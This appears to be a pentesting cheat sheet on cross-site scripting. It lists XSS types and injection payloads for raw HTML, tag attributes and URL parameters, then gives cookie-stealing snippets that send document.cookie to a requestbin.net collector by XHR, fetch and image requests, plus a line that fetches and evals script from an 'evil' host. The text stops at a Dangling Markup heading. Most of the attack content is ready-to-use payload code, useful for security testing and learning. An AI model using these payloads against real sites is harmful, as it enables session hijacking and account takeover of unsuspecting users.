Cross-Site Scripting (also known as XSS) is a vulnerability that allows an attacker to execute Javascript code inside the victim's browser in order to gain privileged access to the victim's account or perform an action as the victim.
Types of XSS
- Reflected XSS - If a value you control is is being reflected immediately in the web page
- Stored XSS - If a value you control is being saved in the server and reflected every time you visit the web page
- DOM XSS - If a value you control is being used by javascript code
Injecting raw HTML tags
If a value you control is being reflected by the site as raw HTML, you can make use of several HTML tags to execute Javascript. Some examples are:
<img src=x onerror=alert()>
<svg onload=alert()></svg>
<script>alert()</script>
<iframe src=”javascript:alert()”></iframe>
If the reflected value is being passed via url parameter, you can also make use of the onfocus event for XSS:
https://xss-game.appspot.com/level1/frame?query=<div id=x onfocus=alert() tabindex=1>#x
Injecting in HTML tag attribute
If a value you control is being reflected in an HTML tag attribute, you can try the following in order:
- Escape from the HTML tag to inject a new tag. Example:
"><img onload=alert()> - If the > character is encoded/deleted. Escape from the attribute to create events, if the tag allows it. Example
" autofocus onfocus=alert() x="- If the tag does not allow certain events, you can try the accesskey trick. Example:
" accesskey="X" onclick=alert() x="
- If the tag does not allow certain events, you can try the accesskey trick. Example:
- If the " character is encoded/deleted. Try to exploit the attribute you control. For example if you control the href attribute, you can inject
javascript:alert(), or if you control an event like the onclick you can try to inject javascript directly
Examples
These examples can not only be used when injecting raw <script> tags, but also when injecting raw HTML tags with exploitable event attributes, such as the onload for the <svg> tag. It is important to have a semicolon (;) between each command when defining multiple commands in a single line.
var cookie = btoa(document.cookie);
// XMLHttpRequest
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://requestbin.net/r/ID?cookie="+cookie, true);
xhr.send()
// fetch
fetch("http://requestbin.net/r/ID?cookie="+cookie)
// fetch and eval external js
fetch('//evil/js').then(r=>r.text().then(eval))
// JS image API
(new Image()).src = "http://requestbin.net/r/ID?cookie="+cookie;
// HTML img tag
document.createElement("img").src = "http://requestbin.net/r/ID?cookie="+cookie;
Dangling Markup
If its not possible to create a HTML tag with an exploitable attribute to execute javascript code, you can try Dangling markup.